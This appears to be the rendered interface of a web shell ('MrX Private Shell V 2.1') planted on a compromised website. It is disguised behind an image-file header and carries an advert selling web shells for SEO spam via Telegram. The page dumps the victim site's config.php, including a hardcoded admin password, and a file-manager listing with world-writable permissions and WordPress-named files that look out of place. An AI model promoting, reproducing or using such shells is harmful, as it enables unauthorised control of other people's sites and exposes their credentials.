����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// config.php
session_start();
// Security configuration
define('ADMIN_USERNAME', 'admin');
// In production, use: password_hash('your_secure_password', PASSWORD_DEFAULT)
define('ADMIN_PASSWORD_HASH', password_hash('admin123', PASSWORD_DEFAULT));
define('XML_FILE', 'arealist.xml');
define('CONTENT_DIR', 'content/');
define('DEFAULT_CONTENT_FILE', 'content/default.php');
// Ensure content directory exists
if (!is_dir(CONTENT_DIR)) {
mkdir(CONTENT_DIR, 0755, true);
}
// CSRF Protection
if (empty($_SESSION['csrf_token'])) {
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
// Helper functions
function createHierarchicalUrlA($slug)
{
return '/' . $slug . '/';
}
function verifyCSRFToken($token)
{
return isset($_SESSION['csrf_token']) && hash_equals($_SESSION['csrf_token'], $token);
}
// Security headers handled below
// config.php - Enhanced version
define('URL', 'delhigal.com');
define('BASE_DOMAIN', 'delhigal.com');
// Security & Performance Settings
define('ENVIRONMENT', 'development'); // Change to 'production' on live server
// Error reporting based on environment
if (ENVIRONMENT === 'development') {
error_reporting(E_ALL);
ini_set('display_errors', 1);
} else {
error_reporting(E_ALL & ~E_NOTICE);
ini_set('display_errors', 0);
}
// Security headers
function setSecurityHeaders()
{
if (!headers_sent()) {
header('X-Frame-Options: SAMEORIGIN');
header('X-XSS-Protection: 1; mode=block');
header('X-Content-Type-Options: nosniff');
}
}
setSecurityHeaders();
include 'functions.php';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .well-known | Folder | 0777 |
|
|
| cache | Folder | 0777 |
|
|
| content | Folder | 0777 |
|
|
| content1 | Folder | 0777 |
|
|
| image | Folder | 0777 |
|
|
| .ftpquota | File | 12 B | 0666 |
|
| .htaccess | File | 197 B | 0444 |
|
| 404.php | File | 1.31 KB | 0666 |
|
| admin.php | File | 35.14 KB | 0666 |
|
| android-chrome-192x192.png | File | 78.08 KB | 0666 |
|
| android-chrome-512x512.png | File | 378.8 KB | 0666 |
|
| apple-touch-icon.png | File | 69.97 KB | 0666 |
|
| arealist.xml | File | 13.18 KB | 0666 |
|
| auth.php | File | 884 B | 0666 |
|
| cache.php | File | 948 B | 0666 |
|
| config.php | File | 1.61 KB | 0666 |
|
| content_manager.php | File | 11.84 KB | 0666 |
|
| delhigal.zip | File | 6.82 MB | 0644 |
|
| error_log | File | 778 B | 0666 |
|
| favicon-16x16.png | File | 977 B | 0666 |
|
| favicon-32x32.png | File | 3.26 KB | 0666 |
|
| favicon.ico | File | 15.04 KB | 0666 |
|
| frontpage.php | File | 113.04 KB | 0666 |
|
| google2fabcdaeda4836e4.html | File | 53 B | 0666 |
|
| index.php | File | 1.62 KB | 0666 |
|
| index1.html | File | 0 B | 0666 |
|
| index1.php | File | 1.63 KB | 0666 |
|
| login.php | File | 2.28 KB | 0666 |
|
| logout.php | File | 73 B | 0666 |
|
| robots.txt | File | 25 B | 0666 |
|
| site.webmanifest | File | 272 B | 0666 |
|
| sitemap.xml | File | 501 B | 0666 |
|
| style.css | File | 27.09 KB | 0666 |
|
| template.php | File | 93.07 KB | 0666 |
|
| wp-blog-header.php | File | 2.74 KB | 0644 |
|
| wp-cron.php | File | 2.74 KB | 0644 |
|
| xml_manager.php | File | 4.17 KB | 0666 |
|